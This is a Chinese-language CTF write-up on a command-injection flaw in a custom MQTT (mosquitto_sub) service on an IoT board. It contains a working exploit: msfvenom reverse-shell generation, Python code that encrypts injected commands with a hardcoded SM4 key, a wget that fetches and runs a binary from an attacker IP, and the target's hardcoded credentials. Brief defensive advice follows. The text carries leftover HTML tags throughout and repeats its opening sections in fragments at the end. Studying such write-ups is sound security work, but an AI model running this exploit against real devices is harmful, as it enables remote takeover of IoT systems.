MQTT服务命令注入漏洞分析与利用教学<\/h1>

1. 漏洞背景<\/h2>
本教学基于西湖论剑2024决赛IoT开发板中的MQTT服务命令注入漏洞(RCE)进行详细分析。该漏洞存在于一个自定义的`mosquitto_sub<\/code>进程中，通过精心构造的MQTT消息可实现远程命令执行。<\/p>`

2. MQTT基础<\/h2>
2.1 MQTT简介<\/h3>
MQTT(Message Queuing Telemetry Transport)是ISO标准(ISO\/IEC PRF 20922)下基于发布\/订阅范式的消息协议，特点包括：<\/p>

工作在TCP\/IP协议族上<\/li>
专为硬件性能低下的远程设备和网络状况糟糕的环境设计<\/li>
轻量级，适合物联网设备通信<\/li>
<\/ul>
2.2 Mosquitto介绍<\/h3>
Mosquitto是一款实现了MQTT协议(v5.0, v3.1.1, v3.1)的开源消息代理软件：<\/p>

提供轻量级的发布\/订阅消息推送模式<\/li>
广泛应用于低功耗传感器、嵌入式设备等场景<\/li>
本案例中运行在1883端口，并通过8888端口转发<\/li>
<\/ul>
3. 漏洞分析<\/h2>
3.1 漏洞位置<\/h3>
漏洞存在于自定义的mosquitto_sub<\/code>进程中，该进程：<\/p>

指定了"block"和"logs"两个topic<\/li>
处理"logs" topic的消息时会调用system函数在"\/var\/log"目录生成文件<\/li>
<\/ul>
3.2 漏洞触发流程<\/h3>

客户端向"logs" topic发布特定格式的JSON消息<\/li>
服务端解析消息中的"info"字段<\/li>
字段内容经过SM4加密和Base64编码处理<\/li>
处理后的内容被直接拼接到system命令中执行<\/li>
<\/ol>
3.3 关键代码逻辑<\/h3>
逆向分析发现的关键处理流程：<\/p>

输入数据格式：{"log":1,"timestamp":"...","info":"..."}<\/code><\/li>
"info"字段内容经过两轮处理变成info2<\/li>
info2校验通过后被拼接到system命令中<\/li>
注入"\n\/bin\/sh\n"<\/code>等字符串可实现命令注入<\/li>
<\/ol>
4. 漏洞利用<\/h2>
4.1 利用条件<\/h3>

认证信息：用户名"xhlj2024"，密码"2758934"<\/li>
目标地址：192.168.1.1:8888<\/li>
消息长度限制：总字符串长度不超过0x60<\/li>
<\/ol>
4.2 利用步骤<\/h3>
4.2.1 准备反弹shell<\/h4>
使用msfvenom生成MIPS架构的反弹shell：<\/p>
msfconsole
<\/span><\/span>use payload\/linux\/mipsle\/shell_reverse_tcp
<\/span><\/span>set LHOST <攻击机IP>
<\/span><\/span>set LPORT 6666<\/span>
<\/span><\/span>generate -f elf -o m
<\/span><\/span><\/code><\/pre>4.2.2 构造利用代码<\/h4>
完整Python利用代码（关键函数）：<\/p>
import<\/span> time
<\/span><\/span>import<\/span> struct
<\/span><\/span>import<\/span> base64
<\/span><\/span>import<\/span> paho.mqtt.client as<\/span> mqtt
<\/span><\/span>from<\/span> gmssl.sm4 import<\/span> CryptSM4, SM4_ENCRYPT, SM4_DECRYPT
<\/span><\/span>
<\/span><\/span>def<\/span> pack_key<\/span>(v24):
<\/span><\/span>    key_bytes =<\/span> b<\/span>''<\/span>
<\/span><\/span>    for<\/span> i in<\/span> range(4<\/span>):
<\/span><\/span>        key_bytes +=<\/span> struct.<\/span>pack('<I'<\/span>, v24[i])  # 小端序打包<\/span>
<\/span><\/span>    return<\/span> key_bytes
<\/span><\/span>
<\/span><\/span>def<\/span> encode_sm4<\/span>(value, key):
<\/span><\/span>    crypt_sm4 =<\/span> CryptSM4()
<\/span><\/span>    crypt_sm4.<\/span>set_key(key, SM4_ENCRYPT)
<\/span><\/span>    return<\/span> crypt_sm4.<\/span>crypt_ecb(value)
<\/span><\/span>
<\/span><\/span>def<\/span> get_input<\/span>(command):
<\/span><\/span>    v24 =<\/span> [0x9845DC01<\/span>, 0x10CD5489<\/span>, 0x67BA23FE<\/span>, 0xEF32AB76<\/span>]
<\/span><\/span>    key_bytes =<\/span> pack_key(v24)
<\/span><\/span>    cmd =<\/span> b<\/span>'"<\/span>\n<\/span>'<\/span> +<\/span> command +<\/span> b<\/span>'<\/span>\n<\/span>'<\/span>
<\/span><\/span>    cmd =<\/span> cmd.<\/span>ljust(0x20<\/span>, b<\/span>"a"<\/span>)  # 填充到32字节<\/span>
<\/span><\/span>    
<\/span><\/span>    sm4_encode =<\/span> encode_sm4(cmd, key_bytes)
<\/span><\/span>    if<\/span> len(sm4_encode) ><\/span> 0x30<\/span>:
<\/span><\/span>        print("[!] SM4加密后数据过长"<\/span>)
<\/span><\/span>        exit(0<\/span>)
<\/span><\/span>        
<\/span><\/span>    after_base64_decode =<\/span> b<\/span>"<\/span>\xbf<\/span>"<\/span> +<\/span> sm4_encode
<\/span><\/span>    mos_input =<\/span> base64.<\/span>b64encode(after_base64_decode)
<\/span><\/span>    return<\/span> mos_input.<\/span>decode()
<\/span><\/span><\/code><\/pre>4.2.3 执行利用<\/h4>


构造三条命令：<\/p>

下载恶意文件：wget http:\/\/<攻击机IP>:9\/m -O \/m<\/code><\/li>
添加执行权限：chmod +x \/m<\/code><\/li>
执行文件：\/m<\/code><\/li>
<\/ul>
<\/li>

构造对应的MQTT消息：<\/p>
<\/li>
<\/ol>
cmd1 =<\/span> b<\/span>'wget http:\/\/192.168.1.219:9\/m -O \/m'<\/span>
<\/span><\/span>cmd2 =<\/span> b<\/span>'chmod +x \/m'<\/span>
<\/span><\/span>cmd3 =<\/span> b<\/span>'\/m'<\/span>
<\/span><\/span>
<\/span><\/span>input1 =<\/span> get_input(cmd1)
<\/span><\/span>input2 =<\/span> get_input(cmd2)
<\/span><\/span>input3 =<\/span> get_input(cmd3)
<\/span><\/span>
<\/span><\/span>p1 =<\/span> '{"log":1,"timestamp":"11-11-11:11:11","info":"'<\/span> +<\/span> input1 +<\/span> '"}'<\/span>
<\/span><\/span>p2 =<\/span> '{"log":1,"timestamp":"11-11-11:11:11","info":"'<\/span> +<\/span> input2 +<\/span> '"}'<\/span>
<\/span><\/span>p3 =<\/span> '{"log":1,"timestamp":"11-11-11:11:11","info":"'<\/span> +<\/span> input3 +<\/span> '"}'<\/span>
<\/span><\/span><\/code><\/pre>
发送MQTT消息：<\/li>
<\/ol>
client =<\/span> mqtt.<\/span>Client(mqtt.<\/span>CallbackAPIVersion.<\/span>VERSION1)
<\/span><\/span>client.<\/span>username_pw_set(username=<\/span>"xhlj2024"<\/span>, password=<\/span>"2758934"<\/span>)
<\/span><\/span>client.<\/span>connect("192.168.1.1"<\/span>, 8888<\/span>)
<\/span><\/span>
<\/span><\/span>topic =<\/span> "logs"<\/span>
<\/span><\/span>client.<\/span>publish(topic, p1)
<\/span><\/span>time.<\/span>sleep(2<\/span>)
<\/span><\/span>client.<\/span>publish(topic, p2)
<\/span><\/span>time.<\/span>sleep(2<\/span>)
<\/span><\/span>client.<\/span>publish(topic, p3)
<\/span><\/span>
<\/span><\/span>client.<\/span>disconnect()
<\/span><\/span><\/code><\/pre>5. 加密处理分析<\/h2>
5.1 SM4加密<\/h3>

使用固定密钥：[0x9845DC01, 0x10CD5489, 0x67BA23FE, 0xEF32AB76]<\/code><\/li>
加密模式：ECB模式<\/li>
填充方式：使用"a"字符填充到32字节<\/li>
<\/ol>
5.2 Base64编码<\/h3>

在SM4加密结果前添加\xbf<\/code>字节<\/li>
对整个结果进行Base64编码<\/li>
最终长度必须能被4整除<\/li>
<\/ol>
6. 防御建议<\/h2>


输入验证：<\/p>

严格过滤\n<\/code>等特殊字符<\/li>
使用白名单验证输入内容<\/li>
<\/ul>
<\/li>

安全编码：<\/p>

避免直接使用system等危险函数<\/li>
使用execve等更安全的替代方案<\/li>
<\/ul>
<\/li>

加密改进：<\/p>

使用动态密钥而非固定密钥<\/li>
添加完整性校验机制<\/li>
<\/ul>
<\/li>

权限控制：<\/p>

以低权限用户运行服务<\/li>
实施最小权限原则<\/li>
<\/ul>
<\/li>
<\/ol>
7. 总结<\/h2>
本漏洞展示了IoT设备中常见的几类安全问题：<\/p>

不安全的输入处理导致命令注入<\/li>
硬编码密钥带来的风险<\/li>
不安全的函数调用（system）<\/li>
缺乏足够的输入验证<\/li>
<\/ol>
通过分析此类漏洞，安全研究人员可以更好地理解IoT设备的安全威胁模型，并采取相应的防护措施。<\/p>

MQTT服务命令注入漏洞分析与利用教学<\/h1>

1. 漏洞背景<\/h2> 本教学基于西湖论剑2024决赛IoT开发板中的MQTT服务命令注入漏洞(RCE)进行详细分析。该漏洞存在于一个自定义的mosquitto_sub<\/code>进程中，通过精心构造的MQTT消息可实现远程命令执行。<\/p>

3. 漏洞分析<\/h2>

4. 漏洞利用<\/h2>

4.2 利用步骤<\/h3>

5. 加密处理分析<\/h2>

1. 漏洞背景<\/h2>
本教学基于西湖论剑2024决赛IoT开发板中的MQTT服务命令注入漏洞(RCE)进行详细分析。该漏洞存在于一个自定义的`mosquitto_sub<\/code>进程中，通过精心构造的MQTT消息可实现远程命令执行。<\/p>`